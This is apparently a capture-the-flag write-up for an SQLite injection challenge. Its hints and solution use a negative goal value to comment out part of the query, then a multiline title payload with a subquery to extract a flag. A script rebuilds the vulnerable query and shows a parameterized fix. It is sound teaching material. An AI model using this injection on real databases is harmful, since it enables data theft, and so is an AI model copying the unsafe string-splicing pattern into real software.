Sqlite3

PunchStarter


Welcome to PunchStarter, your own crowdfunded service!

Create a new project with a fixed goal and a cool title.


In this challenge your goal is to read the flag from the flag column of the flag table (flag(flag)) using an SQL injection.

Good luck :)

Hints

Hint #1

Both inputs seem to be well filtered; however, the goal variable is used in a dangerous way.

Can you find what the mistake is?

Hint #2

What happens if you put a negative value as a goal?

Hint #3

Now you need to fix the original query, and use a subquery to extract the flag.

Solution

Use a negative goal to comment out the end of the query:

$goal = -42

Then use a multiline string to "fix" the query while extracting the flag; don't forget to comment out the trailing quote.

$title =

This will be commented
1, 
(SELECT flag from flag )) --
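As an added illustration (not code from the challenge itself), the script below rebuilds the vulnerable pattern the hints describe in an in-memory SQLite database, runs the solution payload against it, and shows the parameterized form that defeats it. The query shape `VALUES (-$goal, '$title')`, the `projects` table and the sample flag value are assumptions; the challenge's real source is not shown on this page.

```python
import sqlite3

# Solution payload from the write-up above.
PAYLOAD_GOAL = "-42"
PAYLOAD_TITLE = "This will be commented\n1, \n(SELECT flag from flag )) --"

def make_db():
    # Constructed stand-in for the challenge database; schema and flag value are assumed.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE projects (goal INTEGER, title TEXT);"
        "CREATE TABLE flag (flag TEXT);"
        "INSERT INTO flag VALUES ('FLAG{constructed_sample}');"
    )
    return db

def create_project_unsafe(db, title, goal):
    # Assumed vulnerable shape: title is quoted, goal is spliced in unquoted behind a
    # unary minus. A negative goal yields "--", an SQL line comment, so the rest of the
    # line is dropped and the newline-separated title supplies the rest of the query.
    db.execute(f"INSERT INTO projects (goal, title) VALUES (-{goal}, '{title}')")
    db.commit()

def create_project_safe(db, title, goal):
    # Hardened form: validate goal as a positive integer and bind both values as
    # parameters so neither is ever spliced into the SQL text.
    goal = int(goal)
    if goal <= 0:
        raise ValueError("goal must be a positive integer")
    db.execute("INSERT INTO projects (goal, title) VALUES (?, ?)", (goal, title))
    db.commit()

def titles(db):
    return [row[0] for row in db.execute("SELECT title FROM projects")]

def demo_unsafe():
    # Effective query: INSERT INTO projects (goal, title) VALUES (1, (SELECT flag from flag ))
    db = make_db()
    create_project_unsafe(db, PAYLOAD_TITLE, PAYLOAD_GOAL)
    return titles(db)  # ['FLAG{constructed_sample}']: the flag landed in the title column

def demo_safe():
    # The negative goal is rejected; with a valid goal the payload is stored as plain text.
    db = make_db()
    try:
        create_project_safe(db, PAYLOAD_TITLE, PAYLOAD_GOAL)
    except ValueError:
        pass
    create_project_safe(db, PAYLOAD_TITLE, 42)
    return titles(db)  # [PAYLOAD_TITLE]
```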